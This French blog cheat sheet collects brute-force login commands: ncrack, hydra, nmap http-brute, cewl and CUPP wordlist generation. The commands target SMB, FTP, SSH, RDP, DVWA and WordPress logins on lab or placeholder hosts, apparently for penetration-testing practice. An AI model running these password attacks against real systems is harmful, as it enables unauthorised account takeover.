Home
Intrusion avec la force brute
Aide-mémoire

Intrusion avec la force brute

2021-05-24

Essayer les mots de passe du fichier rockyou.txt pour se connecter au partage
ncrack -u username -P rockyou.txt -T 5 192.168.2.2 -p smb -v

Se créer un dictionnaire de mots de passe avec le mots-clés d’un site internet


cewl -d 2 -m 5 -w mylist.txt https://www.searchevolution.com

Se créer un dictionnaire personnalisé pour un usager (mots de passe basé sur le nom des enfants, femmes, animaux de compagnie, date de naissance, etc.)
<a href="https://github.com/Mebus/cupp">CUPP – Common User Passwords Profiler</a>

Essayer de cracker la sécurité HTTP avec la force brute


## HTTP brute force a protected directory. Auditing against http basic, digest and ntlm authentication.
## This script uses the unpwdb and brute libraries to perform password guessing
nmap -p80 --script http-brute --script-args http-brute.path=/printers/ 192.168.x.x

Hydra supporte une multitude de protocole et peut forcer la connexion en utilisant une liste de mots de passe. Voici les protocoles supportés par Hydra

  • TELNET
  • FTP
  • HTTP(S)
  • HTTP-PROXY
  • SMB
  • SMBNT
  • MSSQL
  • MySQL
  • REXEC
  • IRC
  • RSH
  • RLOGIN
  • CVS
  • SNMP
  • SMTP
  • SOCKS5
  • VNC
  • POP3
  • IMAP
  • NNTP
  • PCNFS
  • XMPP
  • ICQ
  • SAP/R3
  • LDAP2
  • LDAP3
  • POSTGRES
  • TEAMSPEAK
  • CISCO AUTH
  • CISCO ENABLE
  • AFP
  • SUBVERSION/SVN
  • FIReBIRD
  • CISCO AAA

hydra -L users.txt -P pass.txt 192.168.0.114 ssh
hydra -l admin -P /usr/share/dirb/wordlists/small.txt 192.168.1.101 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" -V

Si on veut retouver le nom d’un usager wordpress


hydra -L ~/hydra-attaques/names.txt -p patate 10.10.128.147 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.128.147%2Fwp-admin%2F&testcookie=1:Invalid username" -V

Si on veut retrouver un mot de passe par la force brute avec wordpress


hydra -l Elliot -P test.dic 10.10.128.147 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:The password you entered for the username" -t 30

Essayer de se connecter à un serveur ftp avec une liste de mots de passe

ncrack -u germain -P dict.txt ftp://ftp.test.com (-U pour spécifier une liste d'usagers)

Tentative de trouver un mot de passe RDP
hydra -t 4 -V -f -l administrator -P rockyou.txt rdp://192.168.34.16

Related Articles

About The Author

Germain

Leave a Reply